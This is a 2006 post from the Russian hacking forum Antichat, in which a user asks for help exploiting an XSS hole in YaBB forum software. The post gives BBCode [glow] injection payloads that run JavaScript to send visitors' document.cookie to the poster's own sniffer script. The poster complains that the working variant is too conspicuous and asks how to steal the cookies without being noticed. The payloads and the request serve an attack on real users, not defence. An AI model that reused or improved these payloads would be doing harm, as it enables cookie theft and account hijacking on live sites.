ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Нужен хелп с YaBB
  #1  
Старый 27.04.2006, 15:48
Аватар для netf0x
netf0x
Познающий
Регистрация: 27.04.2006
Сообщений: 46
Провел на форуме:
177234

Репутация: 11
По умолчанию Нужен хелп с YaBB

Ситуация такая - есть XSS
пробую юзать:
[glow=red);background:url(javascript:document.locat ion="http://мойсайт/сниф.php?"%20+document.cookie);filter:glow(col or=red,2,300] мое сообщение[/glow]
исполняется, но палевно очень, перебрасывая на сниффер.
другие вариации не прокатывают, я js не знаю, что можно вставить заместо document.location, как правильно заюзать?

например пробовал вот что:
[glow=red);background:url(javascript:document.write (img src= "http://**/*.php"+document.cookie); filter:glow(color=red,2,300]текст[/glow]
не катит

еще:[glow=red);background:url(javascript:new Image(); img.src = "http://***/*.php");filter:glow(color=red,2,300]текст[/glow] не катит


а простой алерт нормально прокатывает, подскажите плз, как сформировать, чтоб получить куки, при этом не вставляя как картинку
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
НУжен Хелп Хацкеров anakin Болталка 18 21.09.2006 19:21
АЙ НИД ХЕЛП SDA Чаты 0 13.01.2005 14:05
НАРОД пожалуйсто ХЕЛП... d0Ck Болталка 8 25.12.2004 15:00
ХЕЛП arhangel Чаты 6 29.11.2004 00:39
Нужен хелп по одиге Чаты 1 13.06.2002 21:07



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ